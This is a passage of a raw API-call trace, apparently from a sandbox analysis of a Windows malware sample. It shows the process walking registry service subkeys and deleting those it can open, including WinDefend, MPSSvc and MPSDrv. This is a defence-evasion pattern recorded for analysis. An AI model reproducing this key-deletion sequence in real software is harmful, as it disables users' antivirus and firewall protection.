lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E97D-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.622] lstrlenW (lpString="{4D36E97D-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.622] GetProcessHeap () returned 0x510000 [0085.622] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527530 [0085.622] GetProcessHeap () returned 0x510000 [0085.622] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528578 [0085.622] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x69, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E980-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.622] lstrlenW (lpString="{4D36E980-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.622] GetProcessHeap () returned 0x510000 [0085.622] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527588 [0085.622] GetProcessHeap () returned 0x510000 [0085.622] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528598 [0085.622] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{50DD5230-BA8A-11D1-BF5D-0000F805F530}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.622] lstrlenW (lpString="{50DD5230-BA8A-11D1-BF5D-0000F805F530}") returned 38 [0085.622] GetProcessHeap () returned 0x510000 [0085.622] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5275e0 [0085.622] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5285b8 [0085.623] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6b, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{533C5B84-EC70-11D2-9505-00C04F79DEAF}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.623] lstrlenW (lpString="{533C5B84-EC70-11D2-9505-00C04F79DEAF}") returned 38 [0085.623] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527638 [0085.623] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5285d8 [0085.623] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6c, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.623] lstrlenW (lpString="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}") returned 38 [0085.623] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527690 [0085.623] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5285f8 [0085.623] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6d, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{71A27CDD-812A-11D0-BEC7-08002BE2092F}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.623] lstrlenW (lpString="{71A27CDD-812A-11D0-BEC7-08002BE2092F}") returned 38 [0085.623] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5276e8 [0085.623] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528618 [0085.623] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6e, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.623] lstrlenW (lpString="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}") returned 38 [0085.623] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527740 [0085.623] GetProcessHeap () returned 0x510000 [0085.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528638 [0085.623] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x6f, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.624] lstrlenW (lpString="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}") returned 38 [0085.624] GetProcessHeap () returned 0x510000 [0085.624] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527798 [0085.624] GetProcessHeap () returned 0x510000 [0085.624] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528658 [0085.624] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x70, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.624] lstrlenW (lpString="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}") returned 38 [0085.624] GetProcessHeap () returned 0x510000 [0085.624] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5277f0 [0085.624] GetProcessHeap () returned 0x510000 [0085.624] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528678 [0085.624] GetProcessHeap () returned 0x510000 [0085.624] GetProcessHeap () returned 0x510000 [0085.624] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5261c8) returned 1 [0085.624] GetProcessHeap () returned 0x510000 [0085.624] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5261c8) returned 0x9e [0085.624] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5261c8 | out: hHeap=0x510000) returned 1 [0085.624] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AFD", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.628] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AppInfo", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.628] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AppMgmt", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.628] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Base", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.628] RegOpenKeyExW (in: hKey=0x78, lpSubKey="BFE", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.647] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Boot Bus Extender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.647] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Boot file system", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.647] RegOpenKeyExW (in: hKey=0x78, lpSubKey="bowser", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.647] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Browser", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.647] RegOpenKeyExW (in: hKey=0x78, lpSubKey="CryptSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.648] RegOpenKeyExW (in: hKey=0x78, lpSubKey="DcomLaunch", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.648] RegOpenKeyExW (in: hKey=0x78, lpSubKey="dfsc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.648] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Dhcp", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.648] RegOpenKeyExW (in: hKey=0x78, lpSubKey="DnsCache", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.648] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Dot3Svc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.649] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Eaphost", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.649] RegOpenKeyExW (in: hKey=0x78, lpSubKey="EFS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.649] RegOpenKeyExW (in: hKey=0x78, lpSubKey="EventLog", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.649] RegOpenKeyExW (in: hKey=0x78, lpSubKey="File system", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.649] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Filter", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.650] RegOpenKeyExW (in: hKey=0x78, lpSubKey="HelpSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.650] RegOpenKeyExW (in: hKey=0x78, lpSubKey="IKEEXT", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.650] RegOpenKeyExW (in: hKey=0x78, lpSubKey="ipnat.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.650] RegOpenKeyExW (in: hKey=0x78, lpSubKey="KeyIso", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.650] RegOpenKeyExW (in: hKey=0x78, lpSubKey="LanmanServer", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.651] RegOpenKeyExW (in: hKey=0x78, lpSubKey="LanmanWorkstation", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.651] RegOpenKeyExW (in: hKey=0x78, lpSubKey="LmHosts", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.651] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Messenger", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.652] RegOpenKeyExW (in: hKey=0x78, lpSubKey="MPSDrv", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x7c) returned 0x0 [0085.652] RegQueryInfoKeyW (in: hKey=0x7c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f958, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f958*=0x0, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.652] RegCloseKey (hKey=0x7c) returned 0x0 [0085.652] RegDeleteKeyExW (hKey=0x78, lpSubKey="MPSDrv", samDesired=0x0, Reserved=0x0) returned 0x0 [0085.652] RegOpenKeyExW (in: hKey=0x78, lpSubKey="MPSSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x7c) returned 0x0 [0085.653] RegQueryInfoKeyW (in: hKey=0x7c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f958, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f958*=0x0, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.653] RegCloseKey (hKey=0x7c) returned 0x0 [0085.653] RegDeleteKeyExW (hKey=0x78, lpSubKey="MPSSvc", samDesired=0x0, Reserved=0x0) returned 0x0 [0085.653] RegOpenKeyExW (in: hKey=0x78, lpSubKey="mrxsmb", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.653] RegOpenKeyExW (in: hKey=0x78, lpSubKey="mrxsmb10", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.653] RegOpenKeyExW (in: hKey=0x78, lpSubKey="mrxsmb20", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.654] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NativeWifiP", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.654] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NDIS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.654] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NDIS Wrapper", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.654] RegOpenKeyExW (in: hKey=0x78, lpSubKey="ndiscap", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.654] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Ndisuio", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.655] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetBIOS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.655] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetBIOSGroup", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.655] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetBT", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.655] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetDDEGroup", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.655] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Netlogon", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.656] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetMan", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.656] RegOpenKeyExW (in: hKey=0x78, lpSubKey="netprofm", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.656] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Network", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.656] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NetworkProvider", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.656] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NlaSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.656] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Nsi", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.657] RegOpenKeyExW (in: hKey=0x78, lpSubKey="nsiproxy.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.657] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NTDS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.657] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PCI Configuration", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.657] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PlugPlay", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.657] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PNP Filter", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.658] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PNP_TDI", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.658] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PolicyAgent", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.658] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Power", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x7c) returned 0x0 [0085.658] RegQueryInfoKeyW (in: hKey=0x7c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f958, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f958*=0x0, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.658] RegCloseKey (hKey=0x7c) returned 0x0 [0085.658] RegDeleteKeyExW (hKey=0x78, lpSubKey="Power", samDesired=0x0, Reserved=0x0) returned 0x0 [0085.658] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Primary disk", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.658] RegOpenKeyExW (in: hKey=0x78, lpSubKey="ProfSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x7c) returned 0x0 [0085.659] RegQueryInfoKeyW (in: hKey=0x7c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f958, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f958*=0x0, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.659] RegCloseKey (hKey=0x7c) returned 0x0 [0085.659] RegDeleteKeyExW (hKey=0x78, lpSubKey="ProfSvc", samDesired=0x0, Reserved=0x0) returned 0x0 [0085.659] RegOpenKeyExW (in: hKey=0x78, lpSubKey="rdbss", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.659] RegOpenKeyExW (in: hKey=0x78, lpSubKey="rdpencdd.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.659] RegOpenKeyExW (in: hKey=0x78, lpSubKey="rdsessmgr", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.659] RegOpenKeyExW (in: hKey=0x78, lpSubKey="RpcEptMapper", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.660] RegOpenKeyExW (in: hKey=0x78, lpSubKey="RpcSs", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.660] RegOpenKeyExW (in: hKey=0x78, lpSubKey="sacsvr", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.660] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SCardSvr", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.661] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SCSI Class", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.661] RegOpenKeyExW (in: hKey=0x78, lpSubKey="sermouse.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.661] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SharedAccess", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.662] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Streams Drivers", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.662] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SWPRV", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.662] RegOpenKeyExW (in: hKey=0x78, lpSubKey="System Bus Extender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.663] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TabletInputService", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.663] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TBS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.663] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Tcpip", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.664] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TDI", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.664] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TrustedInstaller", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.664] RegOpenKeyExW (in: hKey=0x78, lpSubKey="VaultSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.665] RegOpenKeyExW (in: hKey=0x78, lpSubKey="VDS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.665] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vga.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.665] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vgasave.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.666] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vmms", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.666] RegOpenKeyExW (in: hKey=0x78, lpSubKey="volmgr.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.666] RegOpenKeyExW (in: hKey=0x78, lpSubKey="volmgrx.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.667] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WinDefend", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x7c) returned 0x0 [0085.667] RegQueryInfoKeyW (in: hKey=0x7c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x30f958, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x30f958*=0x0, lpcbMaxSubKeyLen=0x30f96c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.667] RegCloseKey (hKey=0x7c) returned 0x0 [0085.667] RegDeleteKeyExW (hKey=0x78, lpSubKey="WinDefend", samDesired=0x0, Reserved=0x0) returned 0x0 [0085.668] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WinMgmt", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.668] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Wlansvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.668] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfPf", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.669] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfRd", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.669] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x30f970 | out: phkResult=0x30f970*=0x0) returned 0x5 [0085.669] RegOpenKeyExW (in: hKey=0x78, 